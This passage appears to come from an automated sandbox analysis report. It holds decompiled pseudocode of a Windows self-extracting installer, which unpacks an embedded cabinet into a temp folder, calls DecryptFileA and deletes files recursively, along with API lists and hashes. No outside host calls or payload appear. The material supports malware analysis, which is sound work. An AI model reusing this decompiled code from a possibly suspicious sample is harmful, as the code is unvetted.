                              							if(( *0x10e9a34 & 0x00000008) == 0) {
                              								L20:
                              								_t103 =  *0x10e9a38; // 0x0
                              								_t110 =  *((intOrPtr*)(0x10e89e0 + (_t78 & 0x0000ffff) * 4));
                              								L21:
                              								__eflags = (_v804 & 0x00000003) - 3;
                              								if((_v804 & 0x00000003) != 3) {
                              									__eflags = _v804 & 0x00000001;
                              									if((_v804 & 0x00000001) == 0) {
                              										__eflags = _t103 - _t116;
                              									} else {
                              										__eflags = _t110 - _t116;
                              									}
                              								} else {
                              									__eflags = _t103 + _t110 - _t116;
                              								}
                              								if(__eflags <= 0) {
                              									 *0x10e9124 = 0;
                              									_t66 = 1;
                              								} else {
                              									_t66 = E010E268B(_a4, _t110, _t103,  &_v16);
                              								}
                              								goto L32;
                              							}
                              							__eflags = _v816 & 0x00008000;
                              							if((_v816 & 0x00008000) == 0) {
                              								goto L20;
                              							}
                              							_t105 =  *0x10e9a38; // 0x0
                              							_t110 =  *((intOrPtr*)(0x10e89e0 + (_t78 & 0x0000ffff) * 4)) +  *((intOrPtr*)(0x10e89e0 + (_t78 & 0x0000ffff) * 4));
                              							_t103 = (_t105 >> 2) +  *0x10e9a38;
                              							goto L21;
                              						}
                              						_t110 = 0x4c5;
                              						E010E44B9(0, 0x4c5, 0, 0, 0x10, 0);
                              						goto L31;
                              					}
                              					memset( &_v788, 0, 0x200);
                              					 *0x10e9124 = E010E6285();
                              					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                              					_t110 = 0x4f9;
                              					goto L30;
                              				} else {
                              					_t110 = 0x4bc;
                              					E010E44B9(0, 0x4bc, 0, 0, 0x10, 0);
                              					 *0x10e9124 = E010E6285();
                              					_t66 = 0;
                              					L33:
                              					return E010E6CE0(_t66, 0, _v8 ^ _t120, _t110, _t114, _t118);
                              				}
                              			}

                              APIs
                              • GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 010E59A8
                              • SetCurrentDirectoryA.KERNELBASE(?), ref: 010E59AF
                              • GetDiskFreeSpaceA.KERNELBASE(00000000,?,?,?,?,00000001), ref: 010E5A13
                              • MulDiv.KERNEL32(?,?,00000400), ref: 010E5A40
                              • GetVolumeInformationA.KERNELBASE(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 010E5A64
                              • memset.MSVCRT ref: 010E5A7C
                              • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 010E5A98
                              • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 010E5AA5
                              • SetCurrentDirectoryA.KERNEL32(?,?,?,00000010,00000000), ref: 010E5BFC
                                • Part of subcall function 010E44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 010E4518
                                • Part of subcall function 010E44B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 010E4554
                                • Part of subcall function 010E6285: GetLastError.KERNEL32(010E5BBC), ref: 010E6285
                              Memory Dump Source
                              • Source File: 00000000.00000002.447567133.00000000010E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010E0000, based on PE: true
                              • Associated: 00000000.00000002.447560896.00000000010E0000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447574667.00000000010E8000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447580308.00000000010EA000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447580308.00000000010EC000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_10e0000_file.jbxd
                              Similarity
                              • API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
                              • String ID:
                              • API String ID: 4237285672-0
                              • Opcode ID: 54978a5681cc419ada37a4211a6070477243edd0bccdbf3f72e4aae2af9047f7
                              • Instruction ID: 3da3caed5f4dc38d7667c7415ca2ac04e95bcd7a75a8e9d7d9878658bc68f61b
                              • Opcode Fuzzy Hash: 54978a5681cc419ada37a4211a6070477243edd0bccdbf3f72e4aae2af9047f7
                              • Instruction Fuzzy Hash: 3071B5B5A0020C9FEB65DB66CC88BFB77EDEB48748F0444A9F585D7144DA358E848F60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              [Figure: control-flow graph of function 010E4FE0; legend: executed / not executed blocks]
                              C-Code - Quality: 77%
                              			E010E4FE0(void* __edi, void* __eflags) {
                              				void* __ebx;
                              				void* _t8;
                              				struct HWND__* _t9;
                              				int _t10;
                              				void* _t12;
                              				struct HWND__* _t24;
                              				struct HWND__* _t27;
                              				intOrPtr _t29;
                              				void* _t33;
                              				int _t34;
                              				CHAR* _t36;
                              				int _t37;
                              				intOrPtr _t47;
                              
                              				_t33 = __edi;
                              				_t36 = "CABINET";
                              				 *0x10e9144 = E010E468F(_t36, 0, 0);
                              				_t8 = LockResource(LoadResource(0, FindResourceA(0, _t36, 0xa)));
                              				 *0x10e9140 = _t8;
                              				if(_t8 == 0) {
                              					return _t8;
                              				}
                              				_t9 =  *0x10e8584; // 0x0
                              				if(_t9 != 0) {
                              					ShowWindow(GetDlgItem(_t9, 0x842), 0);
                              					ShowWindow(GetDlgItem( *0x10e8584, 0x841), 5);
                              				}
                              				_t10 = E010E4EFD(0, 0);
                              				if(_t10 != 0) {
                              					__imp__#20(E010E4CA0, E010E4CC0, E010E4980, E010E4A50, E010E4AD0, E010E4B60, E010E4BC0, 1, 0x10e9148, _t33);
                              					_t34 = _t10;
                              					if(_t34 == 0) {
                              						L8:
                              						_t29 =  *0x10e9148; // 0x0
                              						_t24 =  *0x10e8584; // 0x0
                              						E010E44B9(_t24, _t29 + 0x514, 0, 0, 0x10, 0);
                              						_t37 = 0;
                              						L9:
                              						goto L10;
                              					}
                              					__imp__#22(_t34, "*MEMCAB", 0x10e1140, 0, E010E4CD0, 0, 0x10e9140); // executed
                              					_t37 = _t10;
                              					if(_t37 == 0) {
                              						goto L9;
                              					}
                              					__imp__#23(_t34); // executed
                              					if(_t10 != 0) {
                              						goto L9;
                              					}
                              					goto L8;
                              				} else {
                              					_t27 =  *0x10e8584; // 0x0
                              					E010E44B9(_t27, 0x4ba, 0, 0, 0x10, 0);
                              					_t37 = 0;
                              					L10:
                              					_t12 =  *0x10e9140; // 0x0
                              					if(_t12 != 0) {
                              						FreeResource(_t12);
                              						 *0x10e9140 = 0;
                              					}
                              					if(_t37 == 0) {
                              						_t47 =  *0x10e91d8; // 0x0
                              						if(_t47 == 0) {
                              							E010E44B9(0, 0x4f8, 0, 0, 0x10, 0);
                              						}
                              					}
                              					if(( *0x10e8a38 & 0x00000001) == 0 && ( *0x10e9a34 & 0x00000001) == 0) {
                              						SendMessageA( *0x10e8584, 0xfa1, _t37, 0);
                              					}
                              					return _t37;
                              				}
                              			}

















                              APIs
                                • Part of subcall function 010E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010E46A0
                                • Part of subcall function 010E468F: SizeofResource.KERNEL32(00000000,00000000,?,010E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010E46A9
                                • Part of subcall function 010E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010E46C3
                                • Part of subcall function 010E468F: LoadResource.KERNEL32(00000000,00000000,?,010E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010E46CC
                                • Part of subcall function 010E468F: LockResource.KERNEL32(00000000,?,010E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010E46D3
                                • Part of subcall function 010E468F: memcpy_s.MSVCRT ref: 010E46E5
                                • Part of subcall function 010E468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 010E46EF
                              • FindResourceA.KERNEL32(00000000,CABINET,0000000A), ref: 010E4FFE
                              • LoadResource.KERNEL32(00000000,00000000), ref: 010E5006
                              • LockResource.KERNEL32(00000000), ref: 010E500D
                              • GetDlgItem.USER32(00000000,00000842), ref: 010E5030
                              • ShowWindow.USER32(00000000), ref: 010E5037
                              • GetDlgItem.USER32(00000841,00000005), ref: 010E504A
                              • ShowWindow.USER32(00000000), ref: 010E5051
                              • FreeResource.KERNEL32(00000000,00000000,00000010,00000000), ref: 010E5111
                              • SendMessageA.USER32(00000FA1,00000000,00000000,00000000), ref: 010E5159
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.447567133.00000000010E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010E0000, based on PE: true
                              • Associated: 00000000.00000002.447560896.00000000010E0000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447574667.00000000010E8000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447580308.00000000010EA000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447580308.00000000010EC000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_10e0000_file.jbxd
                              Similarity
                              • API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
                              • String ID: *MEMCAB$CABINET
                              • API String ID: 1305606123-2642027498
                              • Opcode ID: a2d4346a6d91ca0371768221d2c1031d5c1bd9bafa0f57097448dc0cf3f1a3b7
                              • Instruction ID: b10cefb49644ed1464e62d32c7085b0d69ad4a2bf1db456079051dc8e20a4939
                              • Opcode Fuzzy Hash: a2d4346a6d91ca0371768221d2c1031d5c1bd9bafa0f57097448dc0cf3f1a3b7
                              • Instruction Fuzzy Hash: 3031E6B5740301AFE7305A67AD8DF663ADCA708F59F0444ADB9C1EE149DA7ECC008760
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 406 10e2f1d-10e2f3d 407 10e2f3f-10e2f46 406->407 408 10e2f6c-10e2f73 call 10e5164 406->408 410 10e2f5f-10e2f66 call 10e3a3f 407->410 411 10e2f48 call 10e51e5 407->411 416 10e2f79-10e2f80 call 10e55a0 408->416 417 10e3041 408->417 410->408 410->417 418 10e2f4d-10e2f4f 411->418 416->417 424 10e2f86-10e2fbe GetSystemDirectoryA call 10e658a LoadLibraryA 416->424 420 10e3043-10e3053 call 10e6ce0 417->420 418->417 421 10e2f55-10e2f5d 418->421 421->408 421->410 428 10e2ff7-10e3004 FreeLibrary 424->428 429 10e2fc0-10e2fd4 GetProcAddress 424->429 430 10e3006-10e300c 428->430 431 10e3017-10e3024 SetCurrentDirectoryA 428->431 429->428 432 10e2fd6-10e2fee DecryptFileA 429->432 430->431 433 10e300e call 10e621e 430->433 434 10e3026-10e303c call 10e44b9 call 10e6285 431->434 435 10e3054-10e305a 431->435 432->428 441 10e2ff0-10e2ff5 432->441 445 10e3013-10e3015 433->445 434->417 436 10e305c call 10e3b26 435->436 437 10e3065-10e306c 435->437 447 10e3061-10e3063 436->447 443 10e306e-10e3075 call 10e256d 437->443 444 10e307c-10e3089 437->444 441->428 452 10e307a 443->452 449 10e308b-10e3091 444->449 450 10e30a1-10e30a9 444->450 445->417 445->431 447->417 447->437 449->450 453 10e3093 call 10e3ba2 449->453 455 10e30ab-10e30ad 450->455 456 10e30b4-10e30b7 450->456 452->444 460 10e3098-10e309a 453->460 455->456 457 10e30af call 10e4169 455->457 456->420 457->456 460->417 461 10e309c 460->461 461->450
                              C-Code - Quality: 82%
                              			E010E2F1D(void* __ecx, int __edx) {
                              				signed int _v8;
                              				char _v272;
                              				_Unknown_base(*)()* _v276;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				signed int _t9;
                              				void* _t11;
                              				struct HWND__* _t12;
                              				void* _t14;
                              				int _t21;
                              				signed int _t22;
                              				signed int _t25;
                              				intOrPtr* _t26;
                              				signed int _t27;
                              				void* _t30;
                              				_Unknown_base(*)()* _t31;
                              				void* _t34;
                              				struct HINSTANCE__* _t36;
                              				intOrPtr _t41;
                              				intOrPtr* _t44;
                              				signed int _t46;
                              				int _t47;
                              				void* _t58;
                              				void* _t59;
                              
                              				_t43 = __edx;
                              				_t9 =  *0x10e8004; // 0x9fdbf5b5
                              				_v8 = _t9 ^ _t46;
                              				if( *0x10e8a38 != 0) {
                              					L5:
                              					_t11 = E010E5164(_t52);
                              					_t53 = _t11;
                              					if(_t11 == 0) {
                              						L16:
                              						_t12 = 0;
                              						L17:
                              						return E010E6CE0(_t12, _t36, _v8 ^ _t46, _t43, _t44, _t45);
                              					}
                              					_t14 = E010E55A0(_t53); // executed
                              					if(_t14 == 0) {
                              						goto L16;
                              					} else {
                              						_t45 = 0x105;
                              						GetSystemDirectoryA( &_v272, 0x105);
                              						_t43 = 0x105;
                              						_t40 =  &_v272;
                              						E010E658A( &_v272, 0x105, "advapi32.dll");
                              						_t36 = LoadLibraryA( &_v272);
                              						_t44 = 0;
                              						if(_t36 != 0) {
                              							_t31 = GetProcAddress(_t36, "DecryptFileA");
                              							_v276 = _t31;
                              							if(_t31 != 0) {
                              								_t45 = _t47;
                              								_t40 = _t31;
                              								 *0x10ea288("C:\Users\jones\AppData\Local\Temp\IXP000.TMP\", 0); // executed
                              								_v276();
                              								if(_t47 != _t47) {
                              									_t40 = 4;
                              									asm("int 0x29");
                              								}
                              							}
                              						}
                              						FreeLibrary(_t36);
                              						_t58 =  *0x10e8a24 - _t44; // 0x0
                              						if(_t58 != 0) {
                              							L14:
                              							_t21 = SetCurrentDirectoryA("C:\Users\jones\AppData\Local\Temp\IXP000.TMP\"); // executed
                              							if(_t21 != 0) {
                              								__eflags =  *0x10e8a2c - _t44; // 0x0
                              								if(__eflags != 0) {
                              									L20:
                              									__eflags =  *0x10e8d48 & 0x000000c0;
                              									if(( *0x10e8d48 & 0x000000c0) == 0) {
                              										_t41 =  *0x10e9a40; // 0x3, executed
                              										_t26 = E010E256D(_t41); // executed
                              										_t44 = _t26;
                              									}
                              									_t22 =  *0x10e8a24; // 0x0
                              									 *0x10e9a44 = _t44;
                              									__eflags = _t22;
                              									if(_t22 != 0) {
                              										L26:
                              										__eflags =  *0x10e8a38;
                              										if( *0x10e8a38 == 0) {
                              											__eflags = _t22;
                              											if(__eflags == 0) {
                              												E010E4169(__eflags);
                              											}
                              										}
                              										_t12 = 1;
                              										goto L17;
                              									} else {
                              										__eflags =  *0x10e9a30 - _t22; // 0x0
                              										if(__eflags != 0) {
                              											goto L26;
                              										}
                              										_t25 = E010E3BA2(); // executed
                              										__eflags = _t25;
                              										if(_t25 == 0) {
                              											goto L16;
                              										}
                              										_t22 =  *0x10e8a24; // 0x0
                              										goto L26;
                              									}
                              								}
                              								_t27 = E010E3B26(_t40, _t44);
                              								__eflags = _t27;
                              								if(_t27 == 0) {
                              									goto L16;
                              								}
                              								goto L20;
                              							}
                              							_t43 = 0x4bc;
                              							E010E44B9(0, 0x4bc, _t44, _t44, 0x10, _t44);
                              							 *0x10e9124 = E010E6285();
                              							goto L16;
                              						}
                              						_t59 =  *0x10e9a30 - _t44; // 0x0
                              						if(_t59 != 0) {
                              							goto L14;
                              						}
                              						_t30 = E010E621E(); // executed
                              						if(_t30 == 0) {
                              							goto L16;
                              						}
                              						goto L14;
                              					}
                              				}
                              				_t49 =  *0x10e8a24;
                              				if( *0x10e8a24 != 0) {
                              					L4:
                              					_t34 = E010E3A3F(_t51);
                              					_t52 = _t34;
                              					if(_t34 == 0) {
                              						goto L16;
                              					}
                              					goto L5;
                              				}
                              				if(E010E51E5(_t49) == 0) {
                              					goto L16;
                              				}
                              				_t51 =  *0x10e8a38;
                              				if( *0x10e8a38 != 0) {
                              					goto L5;
                              				}
                              				goto L4;
                              			}





























                              APIs
                              • GetSystemDirectoryA.KERNEL32 ref: 010E2F93
                              • LoadLibraryA.KERNEL32(?,advapi32.dll), ref: 010E2FB2
                              • GetProcAddress.KERNEL32(00000000,DecryptFileA), ref: 010E2FC6
                              • DecryptFileA.ADVAPI32 ref: 010E2FE6
                              • FreeLibrary.KERNEL32(00000000), ref: 010E2FF8
                              • SetCurrentDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 010E301C
                                • Part of subcall function 010E51E5: LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,010E2F4D,?,00000002,00000000), ref: 010E5201
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.447567133.00000000010E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010E0000, based on PE: true
                              • Associated: 00000000.00000002.447560896.00000000010E0000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447574667.00000000010E8000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447580308.00000000010EA000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447580308.00000000010EC000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_10e0000_file.jbxd
                              Similarity
                              • API ID: DirectoryLibrary$AddressAllocCurrentDecryptFileFreeLoadLocalProcSystem
                              • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DecryptFileA$advapi32.dll
                              • API String ID: 2126469477-1173327654
                              • Opcode ID: c06c194b0d319ca05f59e715d46fc9f291c5f9877d168f1c1dcaa292b5ab5e24
                              • Instruction ID: 853da6c4a40e4634c7ab7976031a0ba841307db3622d0450f6a708e4c794cb28
                              • Opcode Fuzzy Hash: c06c194b0d319ca05f59e715d46fc9f291c5f9877d168f1c1dcaa292b5ab5e24
                              • Instruction Fuzzy Hash: 9B41DA31A002058EEB71AB3B9D5C69A3FE8BB54B54F0440A9FAD1CF145EB7AC980CB50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 478 10e5467-10e5484 479 10e551c-10e5528 call 10e1680 478->479 480 10e548a-10e5490 call 10e53a1 478->480 484 10e552d-10e5539 call 10e58c8 479->484 483 10e5495-10e5497 480->483 485 10e549d-10e54c0 call 10e1781 483->485 486 10e5581-10e5583 483->486 493 10e554d-10e5552 484->493 494 10e553b-10e5545 CreateDirectoryA 484->494 499 10e550c-10e551a call 10e658a 485->499 500 10e54c2-10e54d8 GetSystemInfo 485->500 489 10e558d-10e559d call 10e6ce0 486->489 497 10e5554-10e5557 call 10e597d 493->497 498 10e5585-10e558b 493->498 495 10e5577-10e557c call 10e6285 494->495 496 10e5547 494->496 495->486 496->493 507 10e555c-10e555e 497->507 498->489 499->484 505 10e54fe 500->505 506 10e54da-10e54dd 500->506 508 10e5503-10e5507 call 10e658a 505->508 511 10e54df-10e54e2 506->511 512 10e54f7-10e54fc 506->512 507->498 515 10e5560-10e5566 507->515 508->499 513 10e54e4-10e54e7 511->513 514 10e54f0-10e54f5 511->514 512->508 513->499 517 10e54e9-10e54ee 513->517 514->508 515->486 518 10e5568-10e5575 RemoveDirectoryA 515->518 517->508 518->486
                              C-Code - Quality: 75%
                              			E010E5467(CHAR* __ecx, void* __edx, char* _a4) {
                              				signed int _v8;
                              				char _v268;
                              				struct _SYSTEM_INFO _v304;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				signed int _t10;
                              				void* _t13;
                              				intOrPtr _t14;
                              				void* _t16;
                              				void* _t20;
                              				signed int _t26;
                              				void* _t28;
                              				void* _t29;
                              				CHAR* _t48;
                              				signed int _t49;
                              				intOrPtr _t61;
                              
                              				_t10 =  *0x10e8004; // 0x9fdbf5b5
                              				_v8 = _t10 ^ _t49;
                              				_push(__ecx);
                              				if(__edx == 0) {
                              					_t48 = 0x10e91e4;
                              					_t42 = 0x104;
                              					E010E1680(0x10e91e4, 0x104);
                              					L14:
                              					_t13 = E010E58C8(_t48); // executed
                              					if(_t13 != 0) {
                              						L17:
                              						_t42 = _a4;
                              						if(_a4 == 0) {
                              							L23:
                              							 *0x10e9124 = 0;
                              							_t14 = 1;
                              							L24:
                              							return E010E6CE0(_t14, 0, _v8 ^ _t49, _t42, 1, _t48);
                              						}
                              						_t16 = E010E597D(_t48, _t42, 1, 0); // executed
                              						if(_t16 != 0) {
                              							goto L23;
                              						}
                              						_t61 =  *0x10e8a20; // 0x0
                              						if(_t61 != 0) {
                              							 *0x10e8a20 = 0;
                              							RemoveDirectoryA(_t48);
                              						}
                              						L22:
                              						_t14 = 0;
                              						goto L24;
                              					}
                              					if(CreateDirectoryA(_t48, 0) == 0) {
                              						 *0x10e9124 = E010E6285();
                              						goto L22;
                              					}
                              					 *0x10e8a20 = 1;
                              					goto L17;
                              				}
                              				_t42 =  &_v268;
                              				_t20 = E010E53A1(__ecx,  &_v268); // executed
                              				if(_t20 == 0) {
                              					goto L22;
                              				}
                              				_push(__ecx);
                              				_t48 = 0x10e91e4;
                              				E010E1781(0x10e91e4, 0x104, __ecx,  &_v268);
                              				if(( *0x10e9a34 & 0x00000020) == 0) {
                              					L12:
                              					_t42 = 0x104;
                              					E010E658A(_t48, 0x104, 0x10e1140);
                              					goto L14;
                              				}
                              				GetSystemInfo( &_v304);
                              				_t26 = _v304.dwOemId & 0x0000ffff;
                              				if(_t26 == 0) {
                              					_push("i386");
                              					L11:
                              					E010E658A(_t48, 0x104);
                              					goto L12;
                              				}
                              				_t28 = _t26 - 1;
                              				if(_t28 == 0) {
                              					_push("mips");
                              					goto L11;
                              				}
                              				_t29 = _t28 - 1;
                              				if(_t29 == 0) {
                              					_push("alpha");
                              					goto L11;
                              				}
                              				if(_t29 != 1) {
                              					goto L12;
                              				}
                              				_push("ppc");
                              				goto L11;
                              			}





















                              APIs
                              • GetSystemInfo.KERNEL32(?,?,?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 010E54C9
                              • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 010E553D
                              • RemoveDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 010E556F
                                • Part of subcall function 010E53A1: RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 010E53FB
                                • Part of subcall function 010E53A1: GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 010E5402
                                • Part of subcall function 010E53A1: GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 010E541F
                                • Part of subcall function 010E53A1: DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 010E542B
                                • Part of subcall function 010E53A1: CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 010E5434
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.447567133.00000000010E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010E0000, based on PE: true
                              • Associated: 00000000.00000002.447560896.00000000010E0000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447574667.00000000010E8000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447580308.00000000010EA000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447580308.00000000010EC000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_10e0000_file.jbxd
                              Similarity
                              • API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
                              • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$alpha$i386$mips$ppc
                              • API String ID: 1979080616-3374052426
                              • Opcode ID: 7a1ea6c6e6ea6caf80fccfc256f5edd9b8762e3fec6cb53d432a369abab55730
                              • Instruction ID: 9b9a80047c23990354c4d8017fe03c868fc2a731c7b6f9888b3d664ad6fec8d0
                              • Opcode Fuzzy Hash: 7a1ea6c6e6ea6caf80fccfc256f5edd9b8762e3fec6cb53d432a369abab55730
                              • Instruction Fuzzy Hash: AA313876B002019FDB249B3B9C1C5BE7BEAAB9570CF0448AEE5C2C7644DA75CA018B90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              C-Code - Quality: 86%
                              			E010E2390(CHAR* __ecx) {
                              				signed int _v8;
                              				char _v276;
                              				char _v280;
                              				char _v284;
                              				struct _WIN32_FIND_DATAA _v596;
                              				struct _WIN32_FIND_DATAA _v604;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				signed int _t21;
                              				int _t36;
                              				void* _t46;
                              				void* _t62;
                              				void* _t63;
                              				CHAR* _t65;
                              				void* _t66;
                              				signed int _t67;
                              				signed int _t69;
                              
                              				_t69 = (_t67 & 0xfffffff8) - 0x254;
                              				_t21 =  *0x10e8004; // 0x9fdbf5b5
                              				_t22 = _t21 ^ _t69;
                              				_v8 = _t21 ^ _t69;
                              				_t65 = __ecx;
                              				if(__ecx == 0 ||  *((char*)(__ecx)) == 0) {
                              					L10:
                              					_pop(_t62);
                              					_pop(_t66);
                              					_pop(_t46);
                              					return E010E6CE0(_t22, _t46, _v8 ^ _t69, _t58, _t62, _t66);
                              				} else {
                              					E010E1680( &_v276, 0x104, __ecx);
                              					_t58 = 0x104;
                              					E010E16B3( &_v280, 0x104, "*");
                              					_t22 = FindFirstFileA( &_v284,  &_v604); // executed
                              					_t63 = _t22;
                              					if(_t63 == 0xffffffff) {
                              						goto L10;
                              					} else {
                              						goto L3;
                              					}
                              					do {
                              						L3:
                              						_t58 = 0x104;
                              						E010E1680( &_v276, 0x104, _t65);
                              						if((_v604.ftCreationTime & 0x00000010) == 0) {
                              							_t58 = 0x104;
                              							E010E16B3( &_v276, 0x104,  &(_v596.dwReserved1));
                              							SetFileAttributesA( &_v280, 0x80);
                              							DeleteFileA( &_v280);
                              						} else {
                              							if(lstrcmpA( &(_v596.dwReserved1), ".") != 0 && lstrcmpA( &(_v596.cFileName), "..") != 0) {
                              								E010E16B3( &_v276, 0x104,  &(_v596.cFileName));
                              								_t58 = 0x104;
                              								E010E658A( &_v280, 0x104, 0x10e1140);
                              								E010E2390( &_v284);
                              							}
                              						}
                              						_t36 = FindNextFileA(_t63,  &_v596); // executed
                              					} while (_t36 != 0);
                              					FindClose(_t63); // executed
                              					_t22 = RemoveDirectoryA(_t65); // executed
                              					goto L10;
                              				}
                              			}






















                              APIs
                              • FindFirstFileA.KERNELBASE(?,010E8A3A,010E11F4,010E8A3A,00000000,?,?), ref: 010E23F6
                              • lstrcmpA.KERNEL32(?,010E11F8), ref: 010E2427
                              • lstrcmpA.KERNEL32(?,010E11FC), ref: 010E243B
                              • SetFileAttributesA.KERNEL32(?,00000080,?), ref: 010E2495
                              • DeleteFileA.KERNEL32(?), ref: 010E24A3
                              • FindNextFileA.KERNELBASE(00000000,00000010), ref: 010E24AF
                              • FindClose.KERNELBASE(00000000), ref: 010E24BE
                              • RemoveDirectoryA.KERNELBASE(010E8A3A), ref: 010E24C5
                              Memory Dump Source
                              • Source File: 00000000.00000002.447567133.00000000010E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010E0000, based on PE: true
                              • Associated: 00000000.00000002.447560896.00000000010E0000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447574667.00000000010E8000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447580308.00000000010EA000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447580308.00000000010EC000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_10e0000_file.jbxd
                              Similarity
                              • API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
                              • String ID:
                              • API String ID: 836429354-0
                              • Opcode ID: 531053fb93c78579198812fe796480c4181b047cb8c695d6a26e6161e3fc714d
                              • Instruction ID: f3b24f1195a857144386457aedbe47beda473108b88a30a1147442ca3bf8cf12
                              • Opcode Fuzzy Hash: 531053fb93c78579198812fe796480c4181b047cb8c695d6a26e6161e3fc714d
                              • Instruction Fuzzy Hash: C331A1723046409FD330EAA6CC8DAEB77ECAFC8701F04492DA5D58B140EF3899098B52
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 70%
                              			E010E2BFB(struct HINSTANCE__* _a4, intOrPtr _a12) {
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				void* __ebp;
                              				long _t4;
                              				void* _t6;
                              				intOrPtr _t7;
                              				void* _t9;
                              				struct HINSTANCE__* _t12;
                              				intOrPtr* _t17;
                              				signed char _t19;
                              				intOrPtr* _t21;
                              				void* _t22;
                              				void* _t24;
                              				intOrPtr _t32;
                              
                              				_t4 = GetVersion();
                              				if(_t4 >= 0 && _t4 >= 6) {
                              					_t12 = GetModuleHandleW(L"Kernel32.dll");
                              					if(_t12 != 0) {
                              						_t21 = GetProcAddress(_t12, "HeapSetInformation");
                              						if(_t21 != 0) {
                              							_t17 = _t21;
                              							 *0x10ea288(0, 1, 0, 0);
                              							 *_t21();
                              							_t29 = _t24 - _t24;
                              							if(_t24 != _t24) {
                              								_t17 = 4;
                              								asm("int 0x29");
                              							}
                              						}
                              					}
                              				}
